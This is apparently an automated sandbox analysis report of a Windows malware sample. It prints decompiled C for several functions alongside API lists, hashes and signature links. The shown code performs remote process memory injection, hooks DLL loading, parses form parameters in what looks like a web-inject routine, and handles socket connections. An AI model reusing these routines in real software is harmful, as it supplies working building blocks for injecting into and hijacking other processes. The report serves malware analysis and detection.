    • Instruction Fuzzy Hash: 572137756013289FDB20AF64DC88AEE7BA8FF45354F200056F92992290D3B499C0CFA5
    Uniqueness

    Uniqueness Score: -1.00%

    Function 0040727B, Relevance: 6.1, APIs: 4, Instructions: 51injectionCOMMON
    Download Yara Rule
    C-Code - Quality: 100%
    			E0040727B(void* __edi, void* _a4) {
				long _v8;
				struct _MEMORY_BASIC_INFORMATION _v36;
				int _t22;
				void* _t24;

				_t24 =  *0x416bbc; // 0xffffffff
				_t22 = 0;
				if(VirtualQueryEx(_t24, __edi,  &_v36, 0x1c) != 0 && _v36.Protect != 1 && (_v36.Protect & 0x00000100) == 0 && _v36.RegionSize != 0 && VirtualProtectEx(_t24, __edi, 4, 0x40,  &_v8) != 0) {
					_t22 = WriteProcessMemory(_t24, __edi, _a4, 4, 0);
					VirtualProtectEx(_t24, __edi, 4, _v8,  &_v8);
				}
				return 0 | _t22 != 0x00000000;
			}







    0x00407283
    0x00407291
    0x0040729b
    0x004072d3
    0x004072e0
    0x004072e0
    0x004072f0

    APIs
    • VirtualQueryEx.KERNEL32(FFFFFFFF,?,?,0000001C,00000000,00000000), ref: 00407293
    • VirtualProtectEx.KERNEL32(FFFFFFFF,?,00000004,00000040,00000000), ref: 004072BB
    • WriteProcessMemory.KERNEL32(FFFFFFFF,?,?,00000004,00000000), ref: 004072CD
    • VirtualProtectEx.KERNEL32(FFFFFFFF,?,00000004,00000000,00000000), ref: 004072E0
    Memory Dump Source
    • Source File: 00000000.00000002.463690111.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: Virtual$Protect$MemoryProcessQueryWrite
    • String ID:
    • API String ID: 2789181485-0
    • Opcode ID: 17aedc08de5f883db2d2c5ad70e8728a234c94fcca49cf4a6b4c33c16431302a
    • Instruction ID: 9ef884a152b7479fc312cdca4dc7e8f6a3517c135598039bd1538e22fd406e92
    • Opcode Fuzzy Hash: 17aedc08de5f883db2d2c5ad70e8728a234c94fcca49cf4a6b4c33c16431302a
    • Instruction Fuzzy Hash: 51011A71A04218BBEB218B919C49FEF777CAB59718F01807AF601B5180D778EA048BAD
    Uniqueness

    Uniqueness Score: -1.00%

    Function 00405BD4, Relevance: 6.0, APIs: 4, Instructions: 42libraryloaderCOMMON
    Download Yara Rule
    C-Code - Quality: 37%
    			E00405BD4(void* __edx, WCHAR* _a4, long _a8, UNICODE_STRING* _a12, HMODULE* _a16) {
				long _t17;
				void* _t19;
				void* _t20;
				HMODULE* _t22;

				_t19 = __edx;
				_t22 = _a16;
				_t20 =  *0x416cf0(_a4, _a8, _a12, _t22);
				_t17 = LdrLoadDll(_a4, _a8, _a12, _t22);
				if(_t17 == 0 && _t20 != 0 &&  *( *_t22) == 0x5a4d) {
					 *0x416fe8(0x41677c);
					E00407518(0x4164a0, 0x5a4d, _t19,  *_t22, 0xffffffff);
					 *0x416fec(0x41677c);
					E0040493A();
				}
				return _t17;
			}







    0x00405bd4
    0x00405bd9
    0x00405bf1
    0x00405bff
    0x00405c03
    0x00405c1b
    0x00405c2a
    0x00405c30
    0x00405c36
    0x00405c36
    0x00405c41

    APIs
    • LdrGetDllHandle.NTDLL(?,?,?,?), ref: 00405BE7
    • LdrLoadDll.NTDLL(?,?,?,?), ref: 00405BF9
    • RtlEnterCriticalSection.NTDLL(0041677C), ref: 00405C1B
    • RtlLeaveCriticalSection.NTDLL(0041677C), ref: 00405C30
      • Part of subcall function 0040493A: GetModuleHandleA.KERNEL32(00416514), ref: 00404976
      • Part of subcall function 0040493A: GetProcAddress.KERNELBASE(?,?), ref: 0040499B
    Memory Dump Source
    • Source File: 00000000.00000002.463690111.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: CriticalHandleSection$AddressEnterLeaveLoadModuleProc
    • String ID:
    • API String ID: 915114488-0
    • Opcode ID: c06f461430afaaa177753215952a9555f7f7eb03502fbbeed47ecb867c58fa61
    • Instruction ID: 558d5bac78e13009a6f2e0b45e89711926aa9bb97a532c02b3541544237d1897
    • Opcode Fuzzy Hash: c06f461430afaaa177753215952a9555f7f7eb03502fbbeed47ecb867c58fa61
    • Instruction Fuzzy Hash: 04F06D36204208BBDB112F55DC848AB3F69EB89329712813AFA15532A0DB36CC119BA8
    Uniqueness

    Uniqueness Score: -1.00%

    Function 0040CE72, Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 359COMMON
    Download Yara Rule
    C-Code - Quality: 92%
    			E0040CE72(void* __edx, intOrPtr _a4, char _a7, intOrPtr _a8, intOrPtr* _a12, signed int* _a16) {
				signed int _v5;
				char _v6;
				unsigned int _v12;
				signed int _v16;
				unsigned int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				intOrPtr _v36;
				char _v52;
				char _v68;
				char _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short _t140;
				signed int _t146;
				signed short _t147;
				signed short _t148;
				signed int _t149;
				signed short _t151;
				signed char _t152;
				signed int _t153;
				signed int _t157;
				void* _t159;
				signed char _t163;
				unsigned int _t164;
				intOrPtr _t167;
				intOrPtr _t168;
				signed int _t169;
				signed int _t171;
				signed int _t173;
				signed int _t176;
				signed int _t180;
				void* _t191;
				signed int _t192;
				signed int _t196;
				void* _t198;
				intOrPtr _t202;
				signed int _t208;
				signed int _t210;
				signed int _t212;
				void* _t219;
				signed int _t220;
				void* _t223;
				intOrPtr* _t224;
				char* _t239;
				signed int _t246;
				void* _t250;
				intOrPtr _t255;
				signed int _t256;
				signed int _t261;
				signed int* _t262;
				signed int _t263;
				signed int _t264;
				char* _t266;
				signed int _t269;
				intOrPtr* _t271;
				signed int _t273;
				void* _t274;
				void* _t275;

				_t255 = _a8;
				if( *((intOrPtr*)(_t255 + 0x42c)) < 8) {
					return 0;
				}
				_v16 = _v16 & 0x00000000;
				_t269 = E00414398( &_v16, __edx, __eflags, _a4, 0x4e2a, 0x20000000);
				_v32 = _t269;
				_v6 = 0;
				__eflags = _t269;
				if(_t269 == 0) {
					L73:
					E0040F0C0(_v32);
					return _v6;
				} else {
					__eflags = _v16 - 0x10;
					if(_v16 <= 0x10) {
						goto L73;
					} else {
						goto L4;
					}
					while(1) {
						L4:
						__eflags = ( *_t269 & 0x0000ffff) - _v32 + _t269 - _v16;
						if(( *_t269 & 0x0000ffff) - _v32 + _t269 > _v16) {
							goto L73;
						}
						_t140 =  *(_t269 + 8) & 0x0000ffff;
						__eflags = _t140;
						if(_t140 == 0) {
							L13:
							_t269 = _t269 + ( *_t269 & 0x0000ffff);
							__eflags = _t269 - _v32 + 0x10 - _v16;
							if(_t269 - _v32 + 0x10 < _v16) {
								continue;
							}
							goto L73;
						}
						_v12 = (_t140 & 0x0000ffff) + _t269;
						_v24 = E0040F521((_t140 & 0x0000ffff) + _t269);
						_t146 = E0040AD1B((_t140 & 0x0000ffff) + _t269, _t145, _t255,  *((intOrPtr*)(_t255 + 0x400)), 0, 0, 0);
						__eflags = _t146;
						if(_t146 == 0) {
							goto L13;
						}
						_t147 =  *(_t269 + 0xa) & 0x0000ffff;
						__eflags = _t147;
						if(_t147 == 0) {
							L9:
							_t148 =  *(_t269 + 0xc) & 0x0000ffff;
							__eflags = _t148;
							if(_t148 == 0) {
								L15:
								__eflags =  *((char*)(_t269 + 6)) - 9;
								if( *((char*)(_t269 + 6)) > 9) {
									 *((char*)(_t269 + 6)) = 0;
								}
								__eflags =  *(_t269 + 4);
								if( *(_t269 + 4) == 0) {
									 *(_t269 + 4) = 1;
								}
								_t149 =  *((intOrPtr*)(_t269 + 6));
								_v5 = _t149;
								__eflags = _t149;
								if(_t149 == 0) {
									_v5 = 6;
								}
								_t256 =  *(_t255 + 0x428);
								_t219 =  *((intOrPtr*)(_a8 + 0x42c)) + _t256;
								_v20 = _v20 & 0x00000000;
								_t244 = _t256;
								while(1) {
									__eflags = _t256 - _t219;
									if(_t256 >= _t219) {
										break;
									}
									__eflags =  *_t256 - 0x3d;
									if( *_t256 != 0x3d) {
										L40:
										_t256 = _t256 + 1;
										__eflags = _t256;
										continue;
									}
									_t151 =  *(_t269 + 0xe) & 0x0000ffff;
									_a7 = 0;
									__eflags = _t151;
									if(_t151 != 0) {
										_t208 = E0040AD1B((_t151 & 0x0000ffff) + _t269, E0040F521((_t151 & 0x0000ffff) + _t269), _t244, _t256 - _t244, 0, 0, 0);
										__eflags = _t208;
										if(_t208 == 0) {
											_a7 = 1;
										}
									}
									_t152 =  *((intOrPtr*)(_t269 + 5));
									__eflags = _t152;
									if(_t152 != 0) {
										_v20 = _v20 + 1;
										__eflags = (_t152 & 0x000000ff) - _v20;
										if((_t152 & 0x000000ff) != _v20) {
											_t44 =  &_a7;
											 *_t44 = _a7 + 1;
											__eflags =  *_t44;
										}
									}
									_t153 = _t256;
									_v28 = _t256;
									while(1) {
										__eflags = _t153 - _t219;
										if(_t153 >= _t219) {
											break;
										}
										_t153 = _t153 + 1;
										__eflags =  *_t153 - 0x26;
										_v28 = _t153;
										if( *_t153 != 0x26) {
											continue;
										}
										break;
									}
									__eflags = _a7;
									if(_a7 != 0) {
										L39:
										_t244 = _v28 + 1;
										__eflags = _v28 + 1;
										goto L40;
									}
									_t246 = _v5 & 0x000000ff;
									__eflags = _t153 - _t256 - 1 - _t246;
									if(_t153 - _t256 - 1 != _t246) {
										goto L39;
									}
									_t223 = 0;
									__eflags = _t246;
									if(_t246 <= 0) {
										L38:
										_t157 = E004100F6( &_v68, _v12, _v24);
										__eflags = _t157;
										if(_t157 != 0) {
											_t220 = _v5 & 0x000000ff;
											_v36 = _t256 + 1;
											_t159 = E0040F0FC( &_v52, _t256 + 1, _t220);
											 *((char*)(_t275 + _t220 - 0x30)) = 0;
											_v28 = E0040F2EB(_t159, _t223);
											_v20 = 0;
											_t163 = E00408471( &_v20, _t223, 0,  &_v68);
											_v12 = _t163;
											_v24 = 0;
											__eflags = _t163 & 0x00000003;
											if((_t163 & 0x00000003) != 0) {
												_v12 = 0;
											}
											_t224 = _v20;
											_t164 = 4;
											__eflags = _v12 - _t164;
											if(_v12 < _t164) {
												_v12 = _t164;
											} else {
												_v24 =  *_t224;
											}
											asm("sbb dl, dl");
											_v12 = _v12 >> 2;
											_t250 =  ~(_v24 % ( *(_t269 + 4) & 0x000000ff)) + 1;
											_t261 = 1;
											_a7 = _t250;
											__eflags = _v12 - 1;
											if(_v12 <= 1) {
												L53:
												__eflags = _t250;
												if(__eflags <= 0) {
													L62:
													_t167 =  *0x416c34; // 0x25df5a8
													_v6 = 1;
													__eflags = _t250 - 1;
													if(_t250 != 1) {
														_t108 = _t167 + 0x180; // 0x2563499
														_t168 =  *_t108;
													} else {
														_t106 = _t167 + 0x17c; // 0x2563519
														_t168 =  *_t106;
													}
													_a8 = _t168;
													_t169 = E0040F521(_t168);
													_t262 = _a16;
													_t271 = _a12;
													_v16 = _t169;
													_t171 = E0040F053( *_t262 + _t220 + _t169 + 0x14, _t271);
													__eflags = _t171;
													if(_t171 != 0) {
														wnsprintfA( &_v52, 0xf, "%%0%uu", _t220);
														wnsprintfA( &_v84, 0xf,  &_v52, _v28);
														 *_t262 =  *_t262 + E0040F0FC( *_t271 +  *_t262, _a8, _v16);
														E0040F0FC( *_t271 +  *_t262,  &_v84, _t220);
														_t191 =  *_t262 + _t220;
														 *((char*)(_t191 +  *_t271)) = 0xa;
														_t192 = _t191 + 1;
														__eflags = _t192;
														 *_t262 = _t192;
													}
													L68:
													_t263 = _v12;
													_t124 = _t263 + 4; // 0x6
													_t173 = E0040F053(_t124,  &_v20);
													_t273 = _v20;
													__eflags = _t173;
													if(_t173 != 0) {
														__eflags = _a7 - 2;
														if(_a7 != 2) {
															_t180 = _v24 + 1;
															__eflags = _t180;
															 *_t273 = _t180;
														}
														_t176 = _t263 << 2;
														 *((intOrPtr*)(_t176 + _t273)) = _v28;
														__eflags = _t176 + 4;
														E004084E1(_t176 + 4, _t176 + 4, 0,  &_v68, _t273);
													}
													E0040F0C0(_t273);
													goto L73;
												}
												_t264 = E0040F113(__eflags,  *((intOrPtr*)(_a8 + 0x428)),  *((intOrPtr*)(_a8 + 0x42c)));
												_v16 = _t264;
												__eflags = _t264;
												if(_t264 == 0) {
													goto L68;
												}
												_t251 = _a8;
												_t266 = _t264 -  *((intOrPtr*)(_a8 + 0x428)) + _v36;
												__eflags =  *(_t269 + 2) & 0x00000001;
												if(__eflags == 0) {
													E0040F173(_t194, _t266, 0x31, _t220);
													L60:
													_t196 = E0040CDBB(_t251, __eflags, _v16,  *((intOrPtr*)(_t251 + 0x42c)));
													__eflags = _t196;
													if(_t196 == 0) {
														E0040F0C0(_v16);
														goto L68;
													}
													_t250 = _a7;
													goto L62;
												}
												_t274 = _t220 + _t266;
												__eflags = _t266 - _t274;
												if(__eflags >= 0) {
													goto L60;
												} else {
													goto L57;
												}
												do {
													L57:
													_push(0x30);
													_t198 = 0x39;
													 *_t266 = E004101D4(_t198);
													_t266 = _t266 + 1;
													__eflags = _t266 - _t274;
												} while (__eflags < 0);
												_t251 = _a8;
												goto L60;
											} else {
												while(1) {
													__eflags =  *((intOrPtr*)(_t224 + _t261 * 4)) - _v28;
													if( *((intOrPtr*)(_t224 + _t261 * 4)) == _v28) {
														break;
													}
													_t261 = _t261 + 1;
													__eflags = _t261 - _v12;
													if(_t261 < _v12) {
														continue;
													}
													goto L53;
												}
												_a7 = 2;
												_t250 = _a7;
												goto L53;
											}
										}
										goto L39;
									} else {
										goto L35;
									}
									while(1) {
										L35:
										_t202 =  *((intOrPtr*)(_t223 + _t256 + 1));
										__eflags = _t202 - 0x30;
										if(_t202 < 0x30) {
											goto L39;
										}
										__eflags = _t202 - 0x39;
										if(_t202 > 0x39) {
											goto L39;
										}
										_t223 = _t223 + 1;
										__eflags = _t223 - _t246;
										if(_t223 < _t246) {
											continue;
										}
										goto L38;
									}
									goto L39;
								}
								goto L73;
							}
							_t239 = (_t148 & 0x0000ffff) + _t269;
							__eflags =  *_t239 - 0x2a;
							if( *_t239 != 0x2a) {
								L12:
								_t210 = E0040AD1B(_t239, E0040F521(_t239),  *(_t255 + 0x428),  *((intOrPtr*)(_t255 + 0x42c)), 0, 0, 0);
								__eflags = _t210;
								if(_t210 == 0) {
									goto L15;
								}
								goto L13;
							}
							__eflags =  *(_t239 + 1);
							if( *(_t239 + 1) == 0) {
								goto L15;
							}
							goto L12;
						}
						_t212 = E0040AD1B((_t147 & 0x0000ffff) + _t269, E0040F521((_t147 & 0x0000ffff) + _t269),  *(_t255 + 0x428),  *((intOrPtr*)(_t255 + 0x42c)), 0, 0, 0);
						__eflags = _t212;
						if(_t212 == 0) {
							goto L13;
						}
						goto L9;
					}
					goto L73;
				}
			}
































































    0x0040ce79
    0x0040ce83
    0x00000000
    0x0040ce85
    0x0040ce8c
    0x0040cea7
    0x0040ceab
    0x0040ceae
    0x0040ceb2
    0x0040ceb4
    0x0040d256
    0x0040d259
    0x00000000
    0x0040ceba
    0x0040ceba
    0x0040cebe
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x0040cec4
    0x0040cec4
    0x0040cecc
    0x0040cecf
    0x00000000
    0x00000000
    0x0040ced5
    0x0040ced9
    0x0040cedc
    0x0040cf6b
    0x0040cf6e
    0x0040cf78
    0x0040cf7b
    0x00000000
    0x00000000
    0x00000000
    0x0040cf81
    0x0040cee7
    0x0040cefb
    0x0040cefe
    0x0040cf03
    0x0040cf05
    0x00000000
    0x00000000
    0x0040cf07
    0x0040cf0b
    0x0040cf0e
    0x0040cf34
    0x0040cf34
    0x0040cf38
    0x0040cf3b
    0x0040cf86
    0x0040cf86
    0x0040cf8a
    0x0040cf8c
    0x0040cf8c
    0x0040cf8f
    0x0040cf92
    0x0040cf94
    0x0040cf94
    0x0040cf98
    0x0040cf9b
    0x0040cf9e
    0x0040cfa0
    0x0040cfa2
    0x0040cfa2
    0x0040cfa9
    0x0040cfb5
    0x0040cfb7
    0x0040cfbb
    0x0040d063
    0x0040d063
    0x0040d065
    0x00000000
    0x00000000
    0x0040cfc2
    0x0040cfc5
    0x0040d062
    0x0040d062
    0x0040d062
    0x00000000
    0x0040d062
    0x0040cfcb
    0x0040cfcf
    0x0040cfd3
    0x0040cfd6
    0x0040cfef
    0x0040cff4
    0x0040cff6
    0x0040cff8
    0x0040cff8
    0x0040cff6
    0x0040cffc
    0x0040cfff
    0x0040d001
    0x0040d003
    0x0040d009
    0x0040d00c
    0x0040d00e
    0x0040d00e
    0x0040d00e
    0x0040d00e
    0x0040d00c
    0x0040d011
    0x0040d013
    0x0040d016
    0x0040d016
    0x0040d018
    0x00000000
    0x00000000
    0x0040d01a
    0x0040d01b
    0x0040d01e
    0x0040d021
    0x00000000
    0x00000000
    0x00000000
    0x0040d021
    0x0040d023
    0x0040d027
    0x0040d05e
    0x0040d061
    0x0040d061
    0x00000000
    0x0040d061
    0x0040d029
    0x0040d030
    0x0040d032
    0x00000000
    0x00000000
    0x0040d034
    0x0040d036
    0x0040d038
    0x0040d04b
    0x0040d055
    0x0040d05a
    0x0040d05c
    0x0040d070
    0x0040d07b
    0x0040d07e
    0x0040d083
    0x0040d08d
    0x0040d09a
    0x0040d09d
    0x0040d0a2
    0x0040d0a5
    0x0040d0a8
    0x0040d0aa
    0x0040d0ac
    0x0040d0ac
    0x0040d0af
    0x0040d0b4
    0x0040d0b5
    0x0040d0b8
    0x0040d0c1
    0x0040d0ba
    0x0040d0bc
    0x0040d0bc
    0x0040d0d1
    0x0040d0d3
    0x0040d0d9
    0x0040d0db
    0x0040d0dc
    0x0040d0df
    0x0040d0e2
    0x0040d0fb
    0x0040d0fb
    0x0040d0fd
    0x0040d16f
    0x0040d16f
    0x0040d174
    0x0040d178
    0x0040d17b
    0x0040d192
    0x0040d192
    0x0040d17d
    0x0040d17d
    0x0040d17d
    0x0040d17d
    0x0040d19a
    0x0040d19d
    0x0040d1a2
    0x0040d1a7
    0x0040d1ac
    0x0040d1b3
    0x0040d1b8
    0x0040d1ba
    0x0040d1c8
    0x0040d1db
    0x0040d1f5
    0x0040d203
    0x0040d20c
    0x0040d20e
    0x0040d212
    0x0040d212
    0x0040d213
    0x0040d213
    0x0040d215
    0x0040d215
    0x0040d218
    0x0040d21e
    0x0040d223
    0x0040d226
    0x0040d228
    0x0040d22a
    0x0040d22e
    0x0040d233
    0x0040d233
    0x0040d234
    0x0040d234
    0x0040d23b
    0x0040d23e
    0x0040d246
    0x0040d24b
    0x0040d24b
    0x0040d251
    0x00000000
    0x0040d251
    0x0040d113
    0x0040d115
    0x0040d118
    0x0040d11a
    0x00000000
    0x00000000
    0x0040d120
    0x0040d129
    0x0040d12c
    0x0040d130
    0x0040d153
    0x0040d158
    0x0040d163
    0x0040d168
    0x0040d16a
    0x0040d188
    0x00000000
    0x0040d188
    0x0040d16c
    0x00000000
    0x0040d16c
    0x0040d132
    0x0040d135
    0x0040d137
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x0040d139
    0x0040d139
    0x0040d139
    0x0040d13d
    0x0040d143
    0x0040d145
    0x0040d146
    0x0040d146
    0x0040d14a
    0x00000000
    0x0040d0e4
    0x0040d0e4
    0x0040d0e7
    0x0040d0ea
    0x00000000
    0x00000000
    0x0040d0ec
    0x0040d0ed
    0x0040d0f0
    0x00000000
    0x00000000
    0x00000000
    0x0040d0f2
    0x0040d0f4
    0x0040d0f8
    0x00000000
    0x0040d0f8
    0x0040d0e2
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x0040d03a
    0x0040d03a
    0x0040d03a
    0x0040d03e
    0x0040d040
    0x00000000
    0x00000000
    0x0040d042
    0x0040d044
    0x00000000
    0x00000000
    0x0040d046
    0x0040d047
    0x0040d049
    0x00000000
    0x00000000
    0x00000000
    0x0040d049
    0x00000000
    0x0040d03a
    0x00000000
    0x0040d06b
    0x0040cf40
    0x0040cf42
    0x0040cf45
    0x0040cf4c
    0x0040cf62
    0x0040cf67
    0x0040cf69
    0x00000000
    0x00000000
    0x00000000
    0x0040cf69
    0x0040cf47
    0x0040cf4a
    0x00000000
    0x00000000
    0x00000000
    0x0040cf4a
    0x0040cf2b
    0x0040cf30
    0x0040cf32
    0x00000000
    0x00000000
    0x00000000
    0x0040cf32
    0x00000000
    0x0040cec4

    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.463690111.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID:
    • String ID: %%0%uu
    • API String ID: 0-1393091064
    • Opcode ID: defbdd3203f67d4eb0326f87d6c5dc908f28739c948639714bac8d8ebea94302
    • Instruction ID: 31f280b8ed727dcf68fb026ad35811176fe2080427b69b256e17b6a6b9ee605f
    • Opcode Fuzzy Hash: defbdd3203f67d4eb0326f87d6c5dc908f28739c948639714bac8d8ebea94302
    • Instruction Fuzzy Hash: FDD1C470900249AFDF10DFA4C881BBEBBB6AF45308F14807BE595B7282D739994AC759
    Uniqueness

    Uniqueness Score: -1.00%

    Function 004112FD, Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 214COMMON
    Download Yara Rule
    C-Code - Quality: 71%
    			E004112FD(char _a4) {
				char _v9;
				char _v13;
				char _v20;
				unsigned int _v25;
				short _v27;
				signed char _v28;
				unsigned int _v40;
				short _v42;
				char _v44;
				char _v304;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t57;
				short _t72;
				void* _t74;
				void* _t77;
				void* _t78;
				void* _t88;
				char _t90;
				char _t97;
				char _t106;
				char _t124;
				char _t127;
				void* _t130;
				intOrPtr _t131;
				void* _t132;

				_t106 = 0;
				_push(0);
				_push( &_v28);
				_push(_a4);
				_t57 = 7;
				if(E0041053D(_t57) != 0) {
					while(E0041053D(1, _a4,  &_v9, _t106) != 0) {
						if(_v9 == _t106) {
							_t109 = _v25;
							_v13 = 0x5a;
							if(((_v25 & 0x00ff0000 | _v25 >> 0x00000010) >> 0x00000008 | (_t109 & 0x0000ff00 | _t109 << 0x00000010) << 0x00000008) - 1 > 0xfe) {
								L21:
								_v9 = 1;
								if(_v13 != 0x5a) {
									L46:
									return E00411287(_a4, 0xffffffff, _v13, _t106) & 0xffffff00 | _t68 != 0x00000000;
								}
								E0040F173( &_v44,  &_v44, _t106, 0x10);
								_t72 = 2;
								_v44 = _t72;
								_t74 = (_v28 & 0x000000ff) - 1;
								if(_t74 == 0) {
									_v42 = _v27;
									_v40 = _v25;
									_t77 = E004105BC( &_v44, 0x10);
									_t126 = _t77;
									if(_t77 == 0xffffffff) {
										L24:
										_v13 = 0x5b;
										goto L46;
									}
									_t78 = E00411287(_a4, _t126, 0x5a, _t106);
									if(_t78 != 1) {
										if(_t78 != 0xffffffff) {
											_v9 = _t106;
										} else {
											_v13 = 0x5b;
										}
									} else {
										E00410693(_t126, _a4);
										_t106 = 0;
									}
									E004108F5(_t126);
									if(_v9 != 1 || _v13 == 0x5a) {
										L36:
										return _v9;
									} else {
										goto L46;
									}
								}
								if(_t74 == 1) {
									_t127 = E004105F2( &_v44, 0x10, 1);
									_v20 = _t127;
									if(_t127 == 0xffffffff) {
										goto L24;
									}
									_t124 = E00411287(_a4, _t127, 0x5a, _t106);
									if(_t124 != 1) {
										E004108F5(_t127);
										L33:
										if(_t124 == 0xffffffff) {
											goto L24;
										}
										if(_t124 != 1) {
											_v9 = 0;
										}
										goto L36;
									}
									_t88 = E004108D1( &_v20, _t106,  &_a4);
									_t108 = _t88;
									E004108F5(_v20);
									if(_t88 != 0xffffffff) {
										_t125 = _a4;
										_t90 = E00411287(_a4, _t108, 0x5a, 2);
										_v20 = _t90;
										if(_t90 == 1) {
											E00410693(_t108, _t125);
										}
										E004108F5(_t108);
										_t124 = _v20;
										_t106 = 0;
										goto L33;
									}
									_v13 = 0x5b;
									_t106 = 0;
									goto L46;
								}
								goto L24;
							}
							_t130 = 0;
							while(E0041053D(1, _a4,  &_v9, _t106) != 0) {
								_t97 = _v9;
								 *((char*)(_t132 + _t130 - 0x12c)) = _t97;
								if(_t97 == 0) {
									_push( &_v20);
									_push(_t106);
									_push(_t106);
									_push( &_v304);
									_v20 = _t106;
									if( *0x416dc0() == 0) {
										_t131 = _v20;
										while(_t131 != _t106) {
											if( *((intOrPtr*)(_t131 + 4)) == 2) {
												E0040F0FC( &_v25,  *((intOrPtr*)(_t131 + 0x18)) + 4, 4);
												L20:
												 *0x416dc4(_v20);
												if(_t131 == _t106) {
													goto L13;
												}
												goto L21;
											}
											_t131 =  *((intOrPtr*)(_t131 + 0x1c));
										}
										goto L20;
									}
									L13:
									_v13 = 0x5b;
									goto L21;
								}
								_t130 = _t130 + 1;
								if(_t130 <= 0xff) {
									continue;
								}
								goto L1;
							}
							goto L1;
						}
					}
				}
				L1:
				return 0;
			}






























    0x00411309
    0x0041130b
    0x0041130f
    0x00411310
    0x00411315
    0x0041131d
    0x00411330
    0x0041132e
    0x00411345
    0x0041136c
    0x00411375
    0x004113ff
    0x00411403
    0x00411407
    0x00411534
    0x00000000
    0x00411544
    0x00411414
    0x0041141b
    0x0041141c
    0x00411424
    0x00411425
    0x004114d7
    0x004114e3
    0x004114e6
    0x004114eb
    0x004114f0
    0x0041142e
    0x0041142e
    0x00000000
    0x0041142e
    0x004114fd
    0x00411505
    0x00411518
    0x00411520
    0x0041151a
    0x0041151a
    0x0041151a
    0x00411507
    0x0041150c
    0x00411511
    0x00411511
    0x00411523
    0x0041152c
    0x004114c9
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x0041152c
    0x0041142c
    0x00411442
    0x00411444
    0x0041144a
    0x00000000
    0x00000000
    0x00411458
    0x0041145f
    0x004114b2
    0x004114b7
    0x004114ba
    0x00000000
    0x00000000
    0x004114c3
    0x004114c5
    0x004114c5
    0x00000000
    0x004114c3
    0x0041146a
    0x00411472
    0x00411474
    0x0041147c
    0x00411489
    0x00411492
    0x00411497
    0x0041149d
    0x0041149f
    0x0041149f
    0x004114a6
    0x004114ab
    0x004114ae
    0x00000000
    0x004114ae
    0x0041147e
    0x00411482
    0x00000000
    0x00411482
    0x00000000
    0x0041142c
    0x0041137b
    0x0041137d
    0x00411390
    0x00411393
    0x0041139c
    0x004113af
    0x004113b0
    0x004113b1
    0x004113b8
    0x004113b9
    0x004113c4
    0x004113cc
    0x004113da
    0x004113d5
    0x004113ed
    0x004113f2
    0x004113f5
    0x004113fd
    0x00000000
    0x00000000
    0x00000000
    0x004113fd
    0x004113d7
    0x004113d7
    0x00000000
    0x004113de
    0x004113c6
    0x004113c6
    0x00000000
    0x004113c6
    0x0041139e
    0x004113a5
    0x00000000
    0x00000000
    0x00000000
    0x004113a7
    0x00000000
    0x0041137d
    0x0041132e
    0x00411343
    0x0041131f
    0x00000000

    APIs
    • getaddrinfo.WS2_32(?,00000000,00000000,?), ref: 004113BC
    • FreeAddrInfoW.WS2_32(?), ref: 004113F5
      • Part of subcall function 00411287: getpeername.WS2_32(000000FF,00000000,00000000), ref: 004112AB
      • Part of subcall function 00410693: select.WS2_32(00000000,?,00000000,00000000,00000000), ref: 00410724
      • Part of subcall function 004108F5: shutdown.WS2_32(?,00000002), ref: 004108FD
      • Part of subcall function 004108F5: closesocket.WS2_32(?), ref: 00410904
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.463690111.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: AddrFreeInfoclosesocketgetaddrinfogetpeernameselectshutdown
    • String ID: Z
    • API String ID: 263972530-1505515367
    • Opcode ID: d795915d446970e929d6f6a92ade37f0c13d061d5bd64dcc41b6941ba5b22e6e
    • Instruction ID: 1677c04abba9b64f259eae476e470dcc2519a0623ef7b656ea11488e82cf1bee
    • Opcode Fuzzy Hash: d795915d446970e929d6f6a92ade37f0c13d061d5bd64dcc41b6941ba5b22e6e
    • Instruction Fuzzy Hash: 90614D31900158BADF10ABA4CC41BFF7B6A9F05354F044567EB11B76E1D2BC89C587AA
    Uniqueness

    Uniqueness Score: -1.00%

    Function 00407BB7, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 110COMMON
    Download Yara Rule
    C-Code - Quality: 96%
    			E00407BB7(short _a4, signed int _a8, char* _a16, int _a20) {
				char _v5;
				WCHAR* _v12;
				intOrPtr _v40;
				intOrPtr _v48;
				char _v56;
				short _v576;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t39;
				signed char _t41;
				char _t43;
				WCHAR* _t47;
				WCHAR _t48;
				void* _t50;
				short* _t51;
				long _t53;
				signed int _t66;
				short _t72;
				short _t73;
				int _t75;
				WCHAR* _t77;

				_v5 = 0;
				if(_a4 == 0x45 || _a4 == 0x46) {
					E0040B9D4( &_v576);
					_t66 = E0040F533( &_v576) + 1;
					E00414B4B( &_v56);
					_v40 =  *_a8;
					_t39 =  *0x416a8c; // 0x0
					_v48 = _t39;
					_v12 =  &_v576;
					_t41 = E0040FC6E(_t66,  &_v56, __eflags, 0);
					asm("sbb al, al");
					_t43 =  ~_t41 + 1;
					__eflags = _t43;
					_v5 = _t43;
				} else {
					_t66 = ExpandEnvironmentStringsW(E0040F4DC(_a8 | 0xffffffff,  *_a8),  &_v576, 0x104);
					E0040F0C0(_t61);
					_t43 = _v5;
				}
				if(_t66 != 0 && _t43 == 0) {
					_t75 = _a20;
					_t47 = E0040F0A8(_t66 + _t75 + _t66 + _t75 + 0x14);
					_t77 = _t47;
					_t48 = 0x22;
					 *_t77 = _t48;
					_t22 = _t77 + 2; // 0x2
					_t50 = E0040F0FC(_t22,  &_v576, _t66 + _t66);
					_t51 = _t50 + _t77;
					_t72 = 0x22;
					 *_t51 = _t72;
					if(_t75 != 0) {
						_t73 = 0x20;
						 *((short*)(_t51 + 2)) = _t73;
						_t25 = _t66 * 2; // 0x4
